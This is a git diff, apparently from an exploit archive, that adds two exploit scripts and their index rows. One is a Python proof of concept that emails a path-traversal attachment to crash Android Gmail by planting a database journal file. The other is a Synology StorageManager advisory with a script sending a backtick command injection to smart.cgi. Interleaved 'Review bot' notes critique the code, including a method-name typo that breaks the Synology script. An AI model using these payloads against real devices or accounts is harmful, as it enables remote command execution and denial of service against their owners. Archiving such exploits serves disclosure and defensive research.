diff --git a/exploits/android/dos/43189.py b/exploits/android/dos/43189.py
new file mode 100755
index 000000000..9c325289a
--- /dev/null
+++ b/exploits/android/dos/43189.py
@@ -0,0 +1,115 @@
+'''
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342
+
+There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gmail app can access. This bug has the following limitations:
+
+1) the email address has to be a non-Gmail and non Gmailified (Hotmail or Yahoo) account
+2) the file can not overwrite an existing file, it has to be a file that doesn't already exist
+3) there user has to click to download the attachment (and the path looks a bit weird on the screen)
+
+It is possible to modify a EmailProviderBody database using this bug by placing a journal file in the databases directory.
+
+Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your Gmail credentials). WARNING: this PoC will cause Gmail to crash repeatedly, and you will need to re-install it to get it to work again
+
+Content-Type: multipart/mixed; boundary="---
+-714A286D976BF3E58D9D671E37CBCF7C"
+MIME-Version: 1.0
+Subject: hello
+To:
+From: natashenka@google.com + +You will not see this in a MIME-aware mail reader. + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: text/html + +test + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal" +Content-Transfer-Encoding: base64 +Content-Disposition: attachment; filename="test" + +2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l +dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw= + +------714A286D976BF3E58D9D671E37CBCF7C +''' + +import os +import sys +import smtplib +import mimetypes + +from optparse import OptionParser + +from email import encoders +from email.message import Message +from email.mime.audio import MIMEAudio +from email.mime.base import MIMEBase +from email.mime.image import MIMEImage +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +import subprocess +import random + + +def main(): + + + + FROM_ADDRESS = "YOUR FROM ADDRESS HERE" + YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE" + TO_ADDRESS = "ACCOUNT TO ATTACK HERE" + + + + composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C" +MIME-Version: 1.0 +Subject: hello image2adfdfs1 +To: """+ TO_ADDRESS +""" +From: """ + FROM_ADDRESS + """ + 
+You will not see this in a MIME-aware mail reader. + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: text/html + +test + +------714A286D976BF3E58D9D671E37CBCF7C +Content-Type: audio/wav; name="../../../../data/data/com.google.android.gm/databases/EmailProviderBody.db-journal" +Content-Transfer-Encoding: base64 +Content-Disposition: attachment; filename="%2e%2e%2fqpng" + +2dUF+SChY9f/////AAAAABAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRyb2lkX21l +dGFkYXRhYW5kcm9pZF9tZXRhZGF0YQNDUkVBVEUgVEFCTEUgAAAARlkAAABFSgAAAEs7AAAASSw= + +------714A286D976BF3E58D9D671E37CBCF7C""" + + + + + s = smtplib.SMTP_SSL("smtp.gmail.com") + s.login(FROM_ADDRESS, YOUR_CREDENTIAL) + you = TO_ADDRESS + s.sendmail(FROM_ADDRESS, you, composed) + s.quit() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/cgi/webapps/43190.py b/exploits/cgi/webapps/43190.py new file mode 100755 index 000000000..ff565fec3 --- /dev/null +++ b/exploits/cgi/webapps/43190.py 
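Review bot: Of the imports at the top of the new file only `smtplib` is used by `main()`; `os`, `sys`, `mimetypes`, `OptionParser`, the `email`/`email.mime.*` names, `subprocess` and `random` are dead and should be dropped so the module is not mistaken for a general mail-building tool. The file is committed with mode 100755 but its first line is the `'''` docstring rather than a shebang; either add `#!/usr/bin/env python` as line 1 or commit it as 100644. The docstring cites the Project Zero issue but not the affected range, while the `files_exploits.csv` entry in this same commit records `Android Gmail < 7.11.5.176568039`; a header line such as `# Affected: Android Gmail < 7.11.5.176568039 (see files_exploits.csv)` would let readers judge exposure without cross-referencing. The hunk covers the whole file, so `main()` begins and ends inside it.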
@@ -0,0 +1,67 @@
+'''
+SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution
+
+Full report: https://blogs.securiteam.com/index.php/archives/3540
+Twitter: @SecuriTeam_SSD
+Weibo: SecuriTeam_SSD
+
+
+Vulnerability Summary
+The following advisory describes a remote command execution vulnerability
+found in Synology StorageManager.
+
+Storage Manager is “a management application that helps you organize and
+monitor the storage capacity on your Synology NAS. Depending on the model
+and number of installed hard drives, Storage Manager helps you accomplish
+the following tasks:
+
+Create different types of RAID and non-RAID storage configurations, such as
+volumes, disk/RAID groups, iSCSI LUNs, and iSCSI Targets.
+Monitor the overall storage usage of your Synology NAS.
+Inspect the health of installed hard drives and solid state drives.
+Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and
+more.”
+
+Credit
+An independent security researcher, Nigusu Kassahun, has reported this
+vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
+
+Vendor response
+Synology has released patches to address this vulnerability – DSM 5.2-5967-5
+
+For more information: https://www.synology.com/en-global/releaseNote/DS210+
+
+Vulnerability details
+User controlled input is not sufficiently sanitized, and then passed to
+execve function.
+
+Successful exploitation of this vulnerability enables a remote
+unauthenticated user to run commands as root on the machine.
+
+The vulnerable parameter can be found in
+/webman/modules/StorageManager/smart.cgi with parameter
+action=apply&operation=quick&disk=%2Fdev%2Fsda
+
+Proof of Concept
+
+===
+'''
+
+# Synology StorageManager <= 5.2 Remote Root Command Execution
+
+
+import httplib
+
+
+HOST = raw_input("Enter Host: ")
+
+
+#IDOR to bypass auth and ticks to chain commands
+
+conn = httplib.HTTPConnection(HOST)
+
+conn.request("GET","/webman/modules/StorageManager/smart.cgi?action=apply&operation=quick&disk=/dev/sda`id%20>/tmp/LOL`")
+
+res = conn.geresponse()
+
+print res.status, res.reason
\ No newline at end of file
diff --git a/exploits/hardware/webapps/32667.pdf b/exploits/hardware/webapps/32667.pdf
deleted file mode 100644
index 6089659d9..000000000
--- a/exploits/hardware/webapps/32667.pdf
+++ /dev/null
@@ -1 +0,0 @@
-pdf
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f3f4fe907..6cbb0bc3b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5760,6 +5760,7 @@ id,file,description,date,author,type,platform,port
 43184,exploits/multiple/dos/43184.txt,"Exim 4.89 - 'BDAT' Denial of Service",2017-11-27,meh,dos,multiple,
 43185,exploits/windows/dos/43185.pl,"KMPlayer 4.2.2.4 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
 43186,exploits/windows/dos/43186.pl,"Winamp Pro 5.66.Build.3512 - Denial of Service",2017-11-22,R.Yavari,dos,windows,
+43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
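Review bot: `res = conn.geresponse()` is a typo for `getresponse()`; as committed the line raises AttributeError, so the script's only output, `print res.status, res.reason`, is never reached. The script is Python 2 only (`httplib`, `raw_input`, the print statement) yet is committed with mode 100755 and no shebang; a first line of `#!/usr/bin/env python2` above the docstring, or mode 100644, would make that explicit. The `# Synology StorageManager <= 5.2` header comment and the CSV description ("5.2") are vaguer than the advisory text in the same docstring, which names DSM 5.2-5967-5 as the patched release; presumably the affected range is releases before that build, and stating it as `# Affected: DSM releases before 5.2-5967-5 (per vendor response above)` would help defenders assess exposure. The hunk began at L4 and covers the whole file.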
@@ -9145,7 +9146,7 @@ id,file,description,date,author,type,platform,port
 40810,exploits/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,local,linux,
 40811,exploits/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,local,lin_x86-64,
 40812,exploits/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation",2013-12-16,spender,local,linux,
-40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
+40839,exploits/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,local,linux,
 40847,exploits/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",local,linux,
 40848,exploits/windows/local/40848.java,"WinPower 4.9.0.4 - Local Privilege Escalation",2016-11-29,"Kacper Szurek",local,windows,
 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,
@@ -26169,7 +26170,7 @@ id,file,description,date,author,type,platform,port
 22048,exploits/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,webapps,php,
 22050,exploits/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
 22051,exploits/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting",2002-11-27,SecurityTracker.com,webapps,cgi,
-22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
+22052,exploits/cgi/webapps/22052.txt,"YaBB 1 Gold SP 1 - 'YaBB.pl' Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",webapps,cgi,
 22065,exploits/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,webapps,php,
 22070,exploits/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",webapps,windows,
 22071,exploits/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",webapps,php,
@@ -32715,7 +32716,6 @@ id,file,description,date,author,type,platform,port
 32664,exploits/ios/webapps/32664.txt,"iShare Your Moving Library 1.0 iOS - Multiple Vulnerabilities",2014-04-02,Vulnerability-Lab,webapps,ios,8080
 32665,exploits/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
 32666,exploits/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - Cross-Site Request Forgery",2014-04-02,"Necmettin COSKUN",webapps,php,7778
-32667,exploits/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",webapps,hardware,80
 32668,exploits/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities",2014-04-03,"Blessen Thomas",webapps,php,
 32669,exploits/php/webapps/32669.txt,"PHPcksec 0.2 - 'PHPcksec.php' Cross-Site Scripting",2008-12-17,ahmadbady,webapps,php,
 32670,exploits/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",webapps,php,
@@ -38227,3 +38227,4 @@ id,file,description,date,author,type,platform,port
 43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware,
 43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple,
 43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware,
+43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi,